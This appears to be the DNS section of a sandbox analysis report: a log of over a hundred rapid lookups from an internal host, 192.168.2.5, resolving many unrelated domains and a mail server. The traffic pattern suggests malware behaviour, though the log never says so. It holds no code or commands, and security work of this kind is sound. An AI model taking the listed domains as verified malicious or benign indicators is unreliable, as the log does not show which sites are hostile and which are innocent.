Mar 22, 2023 05:45:21.186340094 CET	8.8.8.8	192.168.2.5	0xaf95	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.211941957 CET	8.8.8.8	192.168.2.5	0x6ab7	No error (0)	oaith.ca		192.124.249.12	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.331533909 CET	8.8.8.8	192.168.2.5	0x54c7	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.332205057 CET	8.8.8.8	192.168.2.5	0x5a13	No error (0)	deckoviny.cz		88.86.118.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.367582083 CET	8.8.8.8	192.168.2.5	0x5112	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.384543896 CET	8.8.8.8	192.168.2.5	0xd679	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.399334908 CET	8.8.8.8	192.168.2.5	0xac50	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.763828039 CET	8.8.8.8	192.168.2.5	0xfb5d	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.799875021 CET	8.8.8.8	192.168.2.5	0xfe6d	No error (0)	absblast.com		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.831213951 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	midap.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.831213951 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	midap.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.831213951 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	midap.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.831213951 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	midap.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.898721933 CET	8.8.8.8	192.168.2.5	0xc597	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.960843086 CET	8.8.8.8	192.168.2.5	0x4834	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.960843086 CET	8.8.8.8	192.168.2.5	0x4834	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:21.973958969 CET	8.8.8.8	192.168.2.5	0x778d	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.007489920 CET	8.8.8.8	192.168.2.5	0x56d1	No error (0)	stopllc.com		162.241.233.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.036170959 CET	8.8.8.8	192.168.2.5	0x9b41	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.037029028 CET	8.8.8.8	192.168.2.5	0x139f	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.037029028 CET	8.8.8.8	192.168.2.5	0x139f	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.041393042 CET	8.8.8.8	192.168.2.5	0x1430	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.041393042 CET	8.8.8.8	192.168.2.5	0x1430	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.086988926 CET	8.8.8.8	192.168.2.5	0x8f54	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.087733984 CET	8.8.8.8	192.168.2.5	0xb490	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.097143888 CET	8.8.8.8	192.168.2.5	0xdce2	No error (0)	enguita.net		195.5.116.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.102895021 CET	8.8.8.8	192.168.2.5	0x286b	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.182959080 CET	8.8.8.8	192.168.2.5	0x52a0	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.182959080 CET	8.8.8.8	192.168.2.5	0x52a0	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.182959080 CET	8.8.8.8	192.168.2.5	0x52a0	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.427898884 CET	8.8.8.8	192.168.2.5	0x27c7	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.427898884 CET	8.8.8.8	192.168.2.5	0x27c7	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.443685055 CET	8.8.8.8	192.168.2.5	0x8293	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.478795052 CET	8.8.8.8	192.168.2.5	0x8072	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.509921074 CET	8.8.8.8	192.168.2.5	0x4063	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.525084972 CET	8.8.8.8	192.168.2.5	0x51dc	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.525084972 CET	8.8.8.8	192.168.2.5	0x51dc	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.611867905 CET	8.8.8.8	192.168.2.5	0x9858	No error (0)	thiessen.net		62.75.251.116	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.673122883 CET	8.8.8.8	192.168.2.5	0x662b	No error (0)	bigzz.by		178.249.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.704754114 CET	8.8.8.8	192.168.2.5	0x3662	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.704754114 CET	8.8.8.8	192.168.2.5	0x3662	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.874288082 CET	8.8.8.8	192.168.2.5	0x92dc	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:22.927454948 CET	8.8.8.8	192.168.2.5	0x840f	No error (0)	bggs.com		35.230.155.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.126478910 CET	8.8.8.8	192.168.2.5	0xd017	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.167968035 CET	8.8.8.8	192.168.2.5	0xf309	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.195899963 CET	8.8.8.8	192.168.2.5	0xe148	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.195899963 CET	8.8.8.8	192.168.2.5	0xe148	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.195899963 CET	8.8.8.8	192.168.2.5	0xe148	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.195899963 CET	8.8.8.8	192.168.2.5	0xe148	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.197932005 CET	8.8.8.8	192.168.2.5	0x9aab	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.249681950 CET	8.8.8.8	192.168.2.5	0x543	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.409993887 CET	8.8.8.8	192.168.2.5	0x45aa	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.409993887 CET	8.8.8.8	192.168.2.5	0x45aa	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.466576099 CET	8.8.8.8	192.168.2.5	0xa30f	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.479165077 CET	8.8.8.8	192.168.2.5	0x288d	No error (0)	kevyt.net		172.67.129.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.479165077 CET	8.8.8.8	192.168.2.5	0x288d	No error (0)	kevyt.net		104.21.2.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.564222097 CET	8.8.8.8	192.168.2.5	0x8f36	No error (0)	xult.org		65.52.128.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.566495895 CET	8.8.8.8	192.168.2.5	0xb416	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.591419935 CET	8.8.8.8	192.168.2.5	0xc7d6	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.653260946 CET	8.8.8.8	192.168.2.5	0x3ce	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.653260946 CET	8.8.8.8	192.168.2.5	0x3ce	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.683244944 CET	8.8.8.8	192.168.2.5	0xb593	No error (0)	doggybag.org		213.186.33.16	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.704751968 CET	8.8.8.8	192.168.2.5	0x8e4a	No error (0)	603888.com	num6.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:23.704751968 CET	8.8.8.8	192.168.2.5	0x8e4a	No error (0)	num6.17986.net		67.21.93.229	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.706959963 CET	8.8.8.8	192.168.2.5	0x8870	No error (0)	gydrozo.ru		91.220.211.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.826515913 CET	8.8.8.8	192.168.2.5	0x52f1	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.882049084 CET	8.8.8.8	192.168.2.5	0x92dc	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.883196115 CET	8.8.8.8	192.168.2.5	0x647c	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.883196115 CET	8.8.8.8	192.168.2.5	0x647c	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.883196115 CET	8.8.8.8	192.168.2.5	0x647c	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.950961113 CET	8.8.8.8	192.168.2.5	0x442f	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:23.990577936 CET	8.8.8.8	192.168.2.5	0xeb14	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.033202887 CET	8.8.8.8	192.168.2.5	0x9fe3	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.059145927 CET	8.8.8.8	192.168.2.5	0x8dcb	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.088294029 CET	8.8.8.8	192.168.2.5	0x10e0	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.132158041 CET	8.8.8.8	192.168.2.5	0x1593	No error (0)	nme.co.jp		203.0.113.0	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.304266930 CET	8.8.8.8	192.168.2.5	0xad18	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.394632101 CET	8.8.8.8	192.168.2.5	0x5e45	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.397912979 CET	8.8.8.8	192.168.2.5	0xac5a	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.397912979 CET	8.8.8.8	192.168.2.5	0xac5a	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.412782907 CET	8.8.8.8	192.168.2.5	0xe110	No error (0)	mail.protonmail.ch		185.205.70.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.412782907 CET	8.8.8.8	192.168.2.5	0xe110	No error (0)	mail.protonmail.ch		185.70.42.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.412782907 CET	8.8.8.8	192.168.2.5	0xe110	No error (0)	mail.protonmail.ch		176.119.200.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.446923018 CET	8.8.8.8	192.168.2.5	0x5822	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.446971893 CET	8.8.8.8	192.168.2.5	0x952d	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.447841883 CET	8.8.8.8	192.168.2.5	0x4ee4	No error (0)	bidroll.com		13.56.33.8	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.477787018 CET	8.8.8.8	192.168.2.5	0xc5a0	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.501125097 CET	8.8.8.8	192.168.2.5	0x2af4	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.501215935 CET	8.8.8.8	192.168.2.5	0xee39	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.547276020 CET	8.8.8.8	192.168.2.5	0x9168	No error (0)	enguita.net		195.5.116.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.798470974 CET	8.8.8.8	192.168.2.5	0x7c31	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.837344885 CET	8.8.8.8	192.168.2.5	0x174f	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.837395906 CET	8.8.8.8	192.168.2.5	0xda73	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.881494045 CET	8.8.8.8	192.168.2.5	0x92dc	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.915591002 CET	8.8.8.8	192.168.2.5	0x454e	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.941498041 CET	8.8.8.8	192.168.2.5	0xaefc	Name error (3)	anteph.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:24.978204012 CET	8.8.8.8	192.168.2.5	0x58a4	No error (0)	gcss.com		35.186.238.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.115958929 CET	8.8.8.8	192.168.2.5	0x6b7a	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.214055061 CET	8.8.8.8	192.168.2.5	0x25c	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.297106981 CET	8.8.8.8	192.168.2.5	0x14f4	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.329252958 CET	8.8.8.8	192.168.2.5	0x53a0	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.348181963 CET	8.8.8.8	192.168.2.5	0xf762	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.377732992 CET	8.8.8.8	192.168.2.5	0x3a5d	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.470921040 CET	8.8.8.8	192.168.2.5	0x3b8e	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.591998100 CET	8.8.8.8	192.168.2.5	0xed06	No error (0)	adeesa.net		172.67.209.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.591998100 CET	8.8.8.8	192.168.2.5	0xed06	No error (0)	adeesa.net		104.21.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.644320011 CET	8.8.8.8	192.168.2.5	0x8eac	No error (0)	alexpope.biz		76.74.184.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.647347927 CET	8.8.8.8	192.168.2.5	0x8f08	No error (0)	skgm.ru		91.201.52.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.748600006 CET	8.8.8.8	192.168.2.5	0x3326	No error (0)	araax.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:25.748600006 CET	8.8.8.8	192.168.2.5	0x3326	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:25.748600006 CET	8.8.8.8	192.168.2.5	0x3326	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.748600006 CET	8.8.8.8	192.168.2.5	0x3326	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.754751921 CET	8.8.8.8	192.168.2.5	0x80f	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.786778927 CET	8.8.8.8	192.168.2.5	0xd5de	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.786778927 CET	8.8.8.8	192.168.2.5	0xd5de	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.786778927 CET	8.8.8.8	192.168.2.5	0xd5de	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.786778927 CET	8.8.8.8	192.168.2.5	0xd5de	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.900424004 CET	8.8.8.8	192.168.2.5	0x54ba	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:25.927234888 CET	8.8.8.8	192.168.2.5	0x9f72	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.172626972 CET	8.8.8.8	192.168.2.5	0xbfd2	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.230086088 CET	8.8.8.8	192.168.2.5	0x2943	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.508451939 CET	8.8.8.8	192.168.2.5	0x3556	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.508451939 CET	8.8.8.8	192.168.2.5	0x3556	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.508451939 CET	8.8.8.8	192.168.2.5	0x3556	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.542028904 CET	8.8.8.8	192.168.2.5	0x4811	No error (0)	sidepath.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.542028904 CET	8.8.8.8	192.168.2.5	0x4811	No error (0)	sidepath.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.542028904 CET	8.8.8.8	192.168.2.5	0x4811	No error (0)	sidepath.com		34.193.69.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.542028904 CET	8.8.8.8	192.168.2.5	0x4811	No error (0)	sidepath.com		34.193.204.92	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.653201103 CET	8.8.8.8	192.168.2.5	0x7993	No error (0)	tbvlugus.nl		174.129.25.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.712449074 CET	8.8.8.8	192.168.2.5	0x4855	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.801595926 CET	8.8.8.8	192.168.2.5	0xfc1f	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.927490950 CET	8.8.8.8	192.168.2.5	0x7362	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.928132057 CET	8.8.8.8	192.168.2.5	0x92dc	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:26.940859079 CET	8.8.8.8	192.168.2.5	0xccab	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.010168076 CET	8.8.8.8	192.168.2.5	0xc43	No error (0)	smitko.net		31.15.12.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.038156033 CET	8.8.8.8	192.168.2.5	0x52ff	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.038156033 CET	8.8.8.8	192.168.2.5	0x52ff	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.038156033 CET	8.8.8.8	192.168.2.5	0x52ff	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.038156033 CET	8.8.8.8	192.168.2.5	0x52ff	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.052297115 CET	8.8.8.8	192.168.2.5	0xb37f	No error (0)	bggs.com		35.230.155.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.192984104 CET	8.8.8.8	192.168.2.5	0x566	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.192984104 CET	8.8.8.8	192.168.2.5	0x566	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.301522017 CET	8.8.8.8	192.168.2.5	0x48cf	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.680064917 CET	8.8.8.8	192.168.2.5	0x142c	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.744163036 CET	8.8.8.8	192.168.2.5	0xce8c	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.744163036 CET	8.8.8.8	192.168.2.5	0xce8c	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.766222000 CET	8.8.8.8	192.168.2.5	0xb9b4	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:27.780366898 CET	8.8.8.8	192.168.2.5	0xa2b2	No error (0)	listel.co.jp		49.212.243.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.037472010 CET	8.8.8.8	192.168.2.5	0x839	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.151295900 CET	8.8.8.8	192.168.2.5	0xeec6	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.223421097 CET	8.8.8.8	192.168.2.5	0xaa5d	No error (0)	web-york.com		219.94.129.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.241883993 CET	8.8.8.8	192.168.2.5	0xcbe8	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.274121046 CET	8.8.8.8	192.168.2.5	0x870f	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.274121046 CET	8.8.8.8	192.168.2.5	0x870f	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.403832912 CET	8.8.8.8	192.168.2.5	0x5de2	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.732194901 CET	8.8.8.8	192.168.2.5	0xc775	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.894953012 CET	8.8.8.8	192.168.2.5	0x7b8a	No error (0)	www.fnsds.org	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:28.894953012 CET	8.8.8.8	192.168.2.5	0x7b8a	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:28.894953012 CET	8.8.8.8	192.168.2.5	0x7b8a	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.236.92.93	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:28.894953012 CET	8.8.8.8	192.168.2.5	0x7b8a	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		34.237.200.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.319777966 CET	8.8.8.8	192.168.2.5	0x277b	No error (0)	fdlymca.org		192.124.249.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.350104094 CET	8.8.8.8	192.168.2.5	0xd2b5	No error (0)	www.tyrns.com		62.75.216.137	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.383771896 CET	8.8.8.8	192.168.2.5	0x12ad	No error (0)	captlfix.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.383771896 CET	8.8.8.8	192.168.2.5	0x12ad	No error (0)	captlfix.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.383771896 CET	8.8.8.8	192.168.2.5	0x12ad	No error (0)	captlfix.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.383771896 CET	8.8.8.8	192.168.2.5	0x12ad	No error (0)	captlfix.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.477550983 CET	8.8.8.8	192.168.2.5	0x3d5	No error (0)	mail.protonmail.ch		185.205.70.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.477550983 CET	8.8.8.8	192.168.2.5	0x3d5	No error (0)	mail.protonmail.ch		185.70.42.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.477550983 CET	8.8.8.8	192.168.2.5	0x3d5	No error (0)	mail.protonmail.ch		176.119.200.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.480870008 CET	8.8.8.8	192.168.2.5	0xf849	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.480870008 CET	8.8.8.8	192.168.2.5	0xf849	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.622859955 CET	8.8.8.8	192.168.2.5	0xa72b	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.721391916 CET	8.8.8.8	192.168.2.5	0x50f0	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.779896975 CET	8.8.8.8	192.168.2.5	0x94a3	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.779896975 CET	8.8.8.8	192.168.2.5	0x94a3	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:29.791851997 CET	8.8.8.8	192.168.2.5	0x5ac4	No error (0)	www.pohlfood.com	pohlfood.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:29.791851997 CET	8.8.8.8	192.168.2.5	0x5ac4	No error (0)	pohlfood.com		104.218.10.254	A (IP address)	IN (0x0001)	false
